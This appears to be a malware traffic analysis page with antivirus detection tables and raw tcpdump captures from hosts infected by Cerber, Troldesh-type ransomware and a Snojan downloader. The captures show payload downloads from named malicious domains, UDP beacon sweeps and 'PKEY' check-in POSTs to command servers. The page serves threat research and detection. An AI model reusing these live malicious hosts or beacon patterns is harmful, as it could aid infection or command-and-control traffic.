UnInstall.exe Cerber Ransomware Malware Traffic Analysis PCAP file Download

SHA256:     1f4acebd331ff6fe617afe32da66b7577056a903f077bd79c4bdc534bb044d94
File name:     UnInstall.exe
Detection ratio:     19 / 59
Analysis date:     2017-03-25 02:27:04 UTC

Antivirus     Result     Update
AegisLab     Ransom.Hpcerber.Sm51!c     20170325
Avast     Win32:Malware-gen     20170325
CrowdStrike Falcon (ML)     malicious_confidence_100% (W)     20170130
DrWeb     Trojan.Inject2.51570     20170325
Endgame     malicious (high confidence)     20170317
ESET-NOD32     Win32/Filecoder.Cerber.I     20170325
Fortinet     W32/Kryptik.FQBM!tr     20170325
Invincea     virus.win32.virut.bn     20170203
Kaspersky     UDS:DangerousObject.Multi.Generic     20170325
McAfee     Ransomware-FLJJ!DF9E8845DE72     20170325
McAfee-GW-Edition     BehavesLike.Win32.Conficker.gh     20170325
Palo Alto Networks (Known Signatures)     generic.ml     20170325
Qihoo-360     HEUR/QVM02.0.0487.Malware.Gen     20170325
Rising     Malware.Generic.1!tfe (cloud:nN3uADiketB)     20170325
SentinelOne (Static ML)     static engine – malicious     20170315
Sophos     Mal/Cerber-X     20170325

2017-03-24 21:39:57.755565 IP 192.168.1.102.53049 > 82.165.129.119.80: Flags [P.], seq 0:290, ack 1, win 256, length 290: HTTP: GET /UnInstall.exe HTTP/1.1
E..J/.@…3….fR..w.9.Pa.d.B\doP…aR..GET /UnInstall.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 82.165.129.119
Connection: Keep-Alive

2017-03-24 21:40:08.813612 IP 192.168.1.102.64829 > 149.202.64.0.6892: UDP, length 27
E..7…….)…f..@..=…#.sa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813678 IP 192.168.1.102.64829 > 149.202.64.1.6892: UDP, length 27
E..7s…..0….f..@..=…#.ra8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813681 IP 192.168.1.102.64829 > 149.202.64.2.6892: UDP, length 27
E..7?j….dq…f..@..=…#.qa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813756 IP 192.168.1.102.64829 > 149.202.64.3.6892: UDP, length 27
E..7a…..B….f..@..=…#.pa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813758 IP 192.168.1.102.64829 > 149.202.64.4.6892: UDP, length 27
E..7V…..M….f..@..=…#.oa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813823 IP 192.168.1.102.64829 > 149.202.64.5.6892: UDP, length 27
E..7;…..h1…f..@..=…#.na8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813877 IP 192.168.1.102.64829 > 149.202.64.6.6892: UDP, length 27
E..7f…..=….f..@..=…#.ma8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813879 IP 192.168.1.102.64829 > 149.202.64.7.6892: UDP, length 27
E..7…….Q…f..@..=…#.la8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813955 IP 192.168.1.102.64829 > 149.202.64.8.6892: UDP, length 27
E..7h…..:….f..@..=…#.ka8022f1aa8d50098750100000c1
2017-03-24 21:40:08.813957 IP 192.168.1.102.64829 > 149.202.64.9.6892: UDP, length 27
E..7.d…..p…f..@     .=…#.ja8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814033 IP 192.168.1.102.64829 > 149.202.64.10.6892: UDP, length 27
E..7\I….G….f..@..=…#.ia8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814035 IP 192.168.1.102.64829 > 149.202.64.11.6892: UDP, length 27
E..75…..n@…f..@..=…#.ha8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814110 IP 192.168.1.102.64829 > 149.202.64.12.6892: UDP, length 27
E..7AY….bx…f..@..=…#.ga8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814113 IP 192.168.1.102.64829 > 149.202.64.13.6892: UDP, length 27
E..7`…..C….f..@..=…#.fa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814197 IP 192.168.1.102.64829 > 149.202.64.14.6892: UDP, length 27
E..7…….0…f..@..=…#.ea8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814199 IP 192.168.1.102.64829 > 149.202.64.15.6892: UDP, length 27
E..7m8….6….f..@..=…#.da8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814276 IP 192.168.1.102.64829 > 149.202.64.16.6892: UDP, length 27
E..7Bo….a^…f..@..=…#.ca8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814278 IP 192.168.1.102.64829 > 149.202.64.17.6892: UDP, length 27
E..7\…..F….f..@..=…#.ba8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814355 IP 192.168.1.102.64829 > 149.202.64.18.6892: UDP, length 27
E..7…….6…f..@..=…#.aa8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814357 IP 192.168.1.102.64829 > 149.202.64.19.6892: UDP, length 27
E..7pN….3|…f..@..=…#.`a8022f1aa8d50098750100000c1
2017-03-24 21:40:08.814432 IP 192.168.1.102.64829 > 149.202.64.20.6892: UDP, length 27
E..7l…..7….f..@..=…#._a8022f1aa8d50098750100000c1

CERBER Ransomware lobsterscrewallt.top GET /search.php Malware PCAP File Download Traffic Analysis

SHA256:     fa33b75a4e095d6865420c7bd27d7233d7a0653896eb59611f3166466bbfb64a
File name:     1
Detection ratio:     4 / 61
Analysis date:     2017-03-24 23:53:30 UTC

Antivirus     Result     Update
CrowdStrike Falcon (ML)     malicious_confidence_100% (D)     20170130
Endgame     malicious (moderate confidence)     20170317
Invincea     worm.win32.kasidet.f     20170203
McAfee-GW-Edition     BehavesLike.Win32.ObfusRansom.dc     20170324

2017-03-24 21:59:48.601287 IP 192.168.1.102.53097 > 54.145.185.110.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /search.php HTTP/1.1
E..M{*@….r…f6..n.i.P+….Y..P…….GET /search.php HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: lobsterscrewallt.top
Connection: Keep-Alive

2017-03-24 22:00:43.944049 IP 192.168.1.102.58976 > 149.202.64.0.6892: UDP, length 27
E..7………..f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944056 IP 192.168.1.102.58976 > 149.202.64.1.6892: UDP, length 27
E..7wM….,….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944104 IP 192.168.1.102.58976 > 149.202.64.2.6892: UDP, length 27
E..7C…..`1…f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944170 IP 192.168.1.102.58976 > 149.202.64.3.6892: UDP, length 27
E..7f…..=….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944174 IP 192.168.1.102.58976 > 149.202.64.4.6892: UDP, length 27
E..7Z^….I{…f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944247 IP 192.168.1.102.58976 > 149.202.64.5.6892: UDP, length 27
E..7?…..c….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944250 IP 192.168.1.102.58976 > 149.202.64.6.6892: UDP, length 27
E..7k…..8….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944321 IP 192.168.1.102.58976 > 149.202.64.7.6892: UDP, length 27
E..7………..f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944372 IP 192.168.1.102.58976 > 149.202.64.8.6892: UDP, length 27
E..7m+….6….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944376 IP 192.168.1.102.58976 > 149.202.64.9.6892: UDP, length 27
E..7.……0…f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944445 IP 192.168.1.102.58976 > 149.202.64.10.6892: UDP, length 27
E..7`…..CJ…f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944448 IP 192.168.1.102.58976 > 149.202.64.11.6892: UDP, length 27
E..79…..j….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944520 IP 192.168.1.102.58976 > 149.202.64.12.6892: UDP, length 27
E..7E…..^8…f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944524 IP 192.168.1.102.58976 > 149.202.64.13.6892: UDP, length 27
E..7dB….?….f..@..`…#..2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944595 IP 192.168.1.102.58976 > 149.202.64.14.6892: UDP, length 27
E..7………..f..@..`…#.~2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944598 IP 192.168.1.102.58976 > 149.202.64.15.6892: UDP, length 27
E..7qx….2V…f..@..`…#.}2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944669 IP 192.168.1.102.58976 > 149.202.64.16.6892: UDP, length 27
E..7F…..]….f..@..`…#.|2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944672 IP 192.168.1.102.58976 > 149.202.64.17.6892: UDP, length 27
E..7a8….B….f..@..`…#.{2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944743 IP 192.168.1.102.58976 > 149.202.64.18.6892: UDP, length 27
E..7………..f..@..`…#.z2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944746 IP 192.168.1.102.58976 > 149.202.64.19.6892: UDP, length 27
E..7t…../<…f..@..`…#.y2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944804 IP 192.168.1.102.58976 > 149.202.64.20.6892: UDP, length 27
E..7pE….3….f..@..`…#.x2021bcf6b65b0091c5010000097
2017-03-24 22:00:43.944855 IP 192.168.1.102.58976 > 149.202.64.21.6892: UDP, length 27
E..7    ……*…f..@..`…#.w2021bcf6b65b0091c5010000097

RANSOMWARE TOR kaem-sib.ru PCAP File Download Traffic Sample Malware Botnet

SHA256:     1d75dc020643b59c4b7745887e00730d2fcf1a129fc21d657402341812429891
File name:     focus_gropu.exe
Detection ratio:     51 / 61
Analysis date:     2017-03-25 00:20:49 UTC

Antivirus     Result     Update
McAfee-GW-Edition     BehavesLike.Win32.Trojan.dc     20170324
Microsoft     Ransom:Win32/Troldesh.A     20170324
eScan     Trojan.GenericKD.4586233     20170325
NANO-Antivirus     Trojan.Win32.VB.emkvtl     20170324
Palo Alto Networks (Known Signatures)     generic.ml     20170325
Panda     Trj/Genetic.gen     20170324
Qihoo-360     Win32/Trojan.Dropper.489     20170325
Rising     Malware.Generic.5!tfe (cloud:4TqJyxfiS0C)     20170325
SentinelOne (Static ML)     static engine – malicious     20170315
Sophos     Troj/Emogen-BV     20170324
Symantec     Ransom.Kovter     20170324
Tencent     Win32.Trojan.Vb.Wpjn     20170325
TrendMicro     Ransom_CRYPSEN.VC     20170324
TrendMicro-HouseCall     Ransom_CRYPSEN.VC     20170324
VBA32     TScope.Trojan.VB     20170324
VIPRE     Trojan.Win32.Generic!BT     20170325
Webroot     Malicious     20170325
Yandex     Trojan.VB!0amP9/ctkPI     20170323
ZoneAlarm by Check Point     Trojan.Win32.VB.dkbu     20170324

2017-03-24 22:04:51.615705 IP 192.168.1.102.53116 > 176.57.210.35.80: Flags [P.], seq 2149610031:2149610320, ack 1808991785, win 256, length 289: HTTP: GET /focus_gropu.exe HTTP/1.1
E..Ic.@…Q….f.9.#.|.P. r/k..)P…….GET /focus_gropu.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: kaem-sib.ru
Connection: Keep-Alive

2017-03-24 22:06:01.316270 IP 192.168.1.102.53118 > 208.83.223.34.80: Flags [P.], seq 1865667761:1865667961, ack 2691578719, win 256, length 200: HTTP
E….G@….<…f.S.”.~.Po3…n;_P…f…………….{C}f.Tdd…^T..&i.I.Sj…%.i.E….+./.
.       …..3.9./.5……………www.rdurehjc3eat.com………
.4.2………….       .

2017-03-24 22:06:04.845631 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 238393047:238393259, ack 2918993764, win 260, length 212
E…IY@…sZ…f………5….OdP…a…………..h..
..k……/….Nx…w.nw.O..c….+./.
.       …..3.9./.5………%.#.. www.sjfywd4kadz7fm2wyfi5t4ne.com………
.4.2………….       .
……………………………..#……………………………
2017-03-24 22:06:04.852433 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 3812081279:3812081489, ack 2996902744, win 256, length 210
E…B$@……..fY…..#).7…..XP….c…………..*d.5.e…..$.#d.Z.6..f….K..=/….+./.
.       …..3.9./.5………#.!…www.iprzadmkt4twlqiq2zkf6c.com………
.4.2………….       .
……………………………..#……………………………
2017-03-24 22:06:04.892508 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 4258093770:4258093963, ack 4228567313, win 256, length 193
E…:Z@….l…fU../..#)..Z….P…………………)……….?..^…./\…=2v<i….+./.
.       …..3.9./.5…..y………www.x27nr.com………
.4.2………….       .
……………………………..#……………………………
2017-03-24 22:06:04.979745 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 212:338, ack 754, win 258, length 126
E…IZ@…s….f………5….RUP…#…….F…BA..Q.:……..9…..}WNz…Y.M..6<.|.+….R…?…..W.@..6…7′.h………..(…..~…6…..Imv..=|.gN.u…^……h..
2017-03-24 22:06:04.983145 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 210:336, ack 753, win 253, length 126
E…B%@….a…fY…..#).7.Q…HP….Z……F…BA…..`…..8I.j       .7……….m..F.#./.v.u.!…X<10…..!Zx..7-.1>Y……….(.b..~…m….ZW-…JG..R)…|..o.GE….8
2017-03-24 22:06:05.011469 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 193:319, ack 758, win 253, length 126
E…:[@……..fU../..#)..[….P…H.……F…BA..n./w2…”…..g….F.&@……4l..5K………pDVZq…….U….GL……….(K.8.(.T.<-.w.Cb….T…|.._..n….._….
2017-03-24 22:06:05.088478 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 338:376, ack 805, win 257, length 38
E..NI[@…t….f………5.)..R.P………..!…..~…..Z…,…..W..!\..R….
2017-03-24 22:06:05.097271 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 336:374, ack 804, win 253, length 38
E..NB&@……..fY…..#).7…..{P….’……!.b..~……        ..z>……4m……..a
2017-03-24 22:06:05.124872 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 319:357, ack 809, win 253, length 38
E..N:\@……..fU../..#)..\.….9P………..!K.8.(.T..I…..-.{3;Dr.NMq..e.p<.

CERBER Ransomware voperforseanx.top 2.gif Malware Analysis PCAP file Download Traffic Sample

2017-03-24 21:33:08.433085 IP 192.168.1.102.52862 > 47.90.205.113.80: Flags [P.], seq 0:296, ack 1, win 256, length 296: HTTP: GET /user.php?f=2.gif HTTP/1.1
E..P.F@…+….f/Z.q.~.P…….gP…7K..GET /user.php?f=2.gif HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: voperforseanx.top
Connection: Keep-Alive

2017-03-24 21:34:18.965418 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 84798, win 32768, length 0
E..(2.@…s….f.O……1.B…b^P…R………
2017-03-24 21:34:18.965823 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 86258, win 32768, length 0
E..(2.@…s….f.O……1.B…h.P…M………
2017-03-24 21:34:18.966006 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 87718, win 32768, length 0
E..(2.@…s….f.O……1.B…m.P…GM……..
2017-03-24 21:34:18.969465 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 89178, win 32768, length 0
E..(2.@…s….f.O……1.B…szP…A………
2017-03-24 21:34:18.969858 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 90638, win 32768, length 0
E..(2.@…s….f.O……1.B…y.P…;………
2017-03-24 21:34:18.969871 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 91215, win 32695, length 0
E..(2.@…s….f.O……1.B…{oP…9………
2017-03-24 21:34:31.818161 IP 192.168.1.102.56966 > 149.202.64.0.6892: UDP, length 27
E..7.t…..i…f..@……#.(e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818169 IP 192.168.1.102.56966 > 149.202.64.1.6892: UDP, length 27
E..7n…..5….f..@……#.’e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818170 IP 192.168.1.102.56966 > 149.202.64.2.6892: UDP, length 27
E..7;*….h….f..@……#.&e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818260 IP 192.168.1.102.56966 > 149.202.64.3.6892: UDP, length 27
E..7]…..FG…f..@……#.%e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818268 IP 192.168.1.102.56966 > 149.202.64.4.6892: UDP, length 27
E..7Q…..Q….f..@……#.$e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818300 IP 192.168.1.102.56966 > 149.202.64.5.6892: UDP, length 27
E..77g….lq…f..@……#.#e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818312 IP 192.168.1.102.56966 > 149.202.64.6.6892: UDP, length 27
E..7b…..AK…f..@……#.”e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818402 IP 192.168.1.102.56966 > 149.202.64.7.6892: UDP, length 27
E..7.E………f..@……#.!e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818405 IP 192.168.1.102.56966 > 149.202.64.8.6892: UDP, length 27
E..7d…..?*…f..@……#. e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818468 IP 192.168.1.102.56966 > 149.202.64.9.6892: UDP, length 27
E..7.$………f..@     …..#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818471 IP 192.168.1.102.56966 > 149.202.64.10.6892: UDP, length 27
E..7X.….K….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818521 IP 192.168.1.102.56966 > 149.202.64.11.6892: UDP, length 27
E..71R….r….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818593 IP 192.168.1.102.56966 > 149.202.64.12.6892: UDP, length 27
E..7=…..f….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818621 IP 192.168.1.102.56966 > 149.202.64.13.6892: UDP, length 27
E..7[…..H….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818623 IP 192.168.1.102.56966 > 149.202.64.14.6892: UDP, length 27
E..7._…..p…f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818705 IP 192.168.1.102.56966 > 149.202.64.15.6892: UDP, length 27
E..7h…..:….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818706 IP 192.168.1.102.56966 > 149.202.64.16.6892: UDP, length 27
E..7>/….e….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818786 IP 192.168.1.102.56966 > 149.202.64.17.6892: UDP, length 27
E..7X…..K….f..@……#..e008b81bf47e0446950100000f9

Snojan Dynamer Trojan Downloader Malware fifexont.com tonekrant.com FULL PCAP File Download Traffic Analysis

SHA256: a66c3e211004c7d403f633a0ced7327f5b2b102f47be4226d24edcb7ebd21562
File name: front.exe
Detection ratio: 49 / 58
Analysis date: 2017-02-20 05:26:08 UTC
Antivirus Result Update
ALYac Trojan.GenericKD.4294253 20170220
AVG Agent5.AXHG 20170220
AVware Trojan.Win32.Generic!BT 20170220
Ad-Aware Trojan.GenericKD.4294253 20170220
AegisLab Uds.Dangerousobject.Multi!c 20170220
AhnLab-V3 Trojan/Win32.Snojan.C1770480 20170219
Arcabit Trojan.Generic.D41866D 20170220
Avast Win32:Malware-gen 20170220
Avira (no cloud) TR/Crypt.ZPACK.wcpog 20170219
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170217
BitDefender Trojan.GenericKD.4294253 20170220
Bkav HW32.Packed.3570 20170218
CAT-QuickHeal Trojan.Dynamer 20170218
ClamAV Win.Trojan.Generic-5747581-0 20170220
Comodo UnclassifiedMalware 20170220
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130

2017-02-18 07:29:58.854612 IP 192.168.1.102.55863 > 46.30.213.95.80: Flags [P.], seq 0:285, ack 1, win 64240, length 285: HTTP: GET /front.exe HTTP/1.1
E..E}.@….f…f…_.7.P.^$UN..rP…….GET /front.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: galflview.com
Connection: Keep-Alive

2017-02-18 07:30:39.853148 IP 192.168.1.102.58750 > 75.75.75.75.53: 64438+ A? mutinenag.com. (31)
E..;(……)…fKKKK.~.5.’…………..        mutinenag.com…..
2017-02-18 07:30:39.895762 IP 192.168.1.102.49577 > 75.75.75.75.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
E..O(……….fKKKK…5.;[..A……….        mutinenag.com.hsd1.md.comcast.net…..
2017-02-18 07:30:39.926948 IP 192.168.1.102.49577 > 75.75.76.76.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
E..OFa………fKKLL…5.;Y..A……….        mutinenag.com.hsd1.md.comcast.net…..
2017-02-18 07:30:44.725455 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    Y………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:30:58.514427 IP 192.168.1.102.50385 > 75.75.75.75.53: 22454+ A? v10.vortex-win.data.microsoft.com. (51)
E..O(……….fKKKK…5.;..W…………v10.vortex-win.data.microsoft.com…..
2017-02-18 07:31:01.723097 IP 192.168.1.102.50386 > 75.75.75.75.53: 16459+ A? mumeraxo.com. (30)
E..:(……&…fKKKK…5.&.o@K………..mumeraxo.com…..
2017-02-18 07:31:01.794496 IP 192.168.1.102.58993 > 75.75.75.75.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
E..N(……….fKKKK.q.5.:Im5…………mumeraxo.com.hsd1.md.comcast.net…..
2017-02-18 07:31:01.825945 IP 192.168.1.102.58993 > 75.75.76.76.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
E..NFe………fKKLL.q.5.:Hl5…………mumeraxo.com.hsd1.md.comcast.net…..
2017-02-18 07:31:12.547120 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    Z………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:31:23.630061 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……”…fKKKK.r.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:24.641948 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……!…fKKKK.s.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:25.627370 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(…… …fKKKK.t.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:25.629833 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fi………fKKLL.r.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:26.641969 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fj………fKKLL.s.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:27.627190 IP 192.168.1.102.58996 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fk………fKKLL.t.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:27.627605 IP 192.168.1.102.58997 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.u.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:27.630024 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.r.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:28.032961 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [S], seq 3536318263, win 8192, options

2017-02-18 07:31:28.202872 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [P.], seq 0:428, ack 1, win 256, length 428: HTTP: POST /js.php HTTP/1.1
E…m[@……..f].y/.;.P…8..N.P…….POST /js.php HTTP/1.1
Host: tonekrant.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2017-02-18 07:31:28.353750 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [.], ack 2, win 256, length 0
E..(m\@……..f].y/.;.P……N.P…\………
2017-02-18 07:31:28.354903 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [F.], seq 428, ack 2, win 256, length 0
E..(m]@……..f].y/.;.P……N.P…\………
2017-02-18 07:31:28.642457 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.s.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:29.627324 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.t.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:29.630282 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fp………fKKLL.r.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:30.642485 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fq………fKKLL.s.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:37.200322 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    [………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:31:43.367646 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.v.5.&}…………..fifexont.com…..
2017-02-18 07:31:44.361927 IP 192.168.1.102.58999 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.w.5.&}…………..fifexont.com…..
2017-02-18 07:31:45.361997 IP 192.168.1.102.59000 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.x.5.&}…………..fifexont.com…..
2017-02-18 07:31:45.363970 IP 192.168.1.102.58998 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fu………fKKLL.v.5.&|…………..fifexont.com…..
2017-02-18 07:31:46.361710 IP 192.168.1.102.58999 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fv………fKKLL.w.5.&|…………..fifexont.com…..

2017-02-18 07:31:46.827372 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [P.], seq 0:427, ack 1, win 256, length 427: HTTP: POST /js.php HTTP/1.1
E…D.@….1…f].y….P`?Y…..P….’..POST /js.php HTTP/1.1
Host: fifexont.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2017-02-18 07:31:46.976014 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [.], ack 2, win 256, length 0
E..(D.@……..f].y….P`?[…..P………….
2017-02-18 07:31:46.976419 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [F.], seq 427, ack 2, win 256, length 0
E..(D.@……..f].y….P`?[…..P………….
2017-02-18 07:31:47.361693 IP 192.168.1.102.59000 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fw………fKKLL.x.5.&|…………..fifexont.com…..
2017-02-18 07:31:47.364159 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.v.5.&}…………..fifexont.com…..

2017-02-18 07:35:43.355047 IP 192.168.1.102.49579 > 75.75.75.75.53: 44680+ A? tele.trafficmanager.net. (41)
E..E)……….fKKKK…5.13…………..tele.trafficmanager.net…..
2017-02-18 07:35:43.373699 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [S], seq 3222178950, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..45A@….8…f..2M…P………. .r……………
2017-02-18 07:35:43.402299 IP 192.168.1.102.56038 > 65.55.252.190.443: Flags [.], ack 4237, win 253, length 0
E..(.W@….t…fA7…….._.c./.P………….
2017-02-18 07:35:43.457448 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [.], ack 3335379774, win 258, length 0
E..(5B@….C…f..2M…P…….>P…0………
2017-02-18 07:35:43.457557 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [P.], seq 0:189, ack 1, win 258, length 189: HTTP: GET /%7B5F1B98CE-D333-41DA-B5CE-72EFDD71B6DF%7D HTTP/1.1
E…5C@……..f..2M…P…….>P…….GET /%7B5F1B98CE-D333-41DA-B5CE-72EFDD71B6DF%7D HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: client connection
Host: tele.trafficmanager.net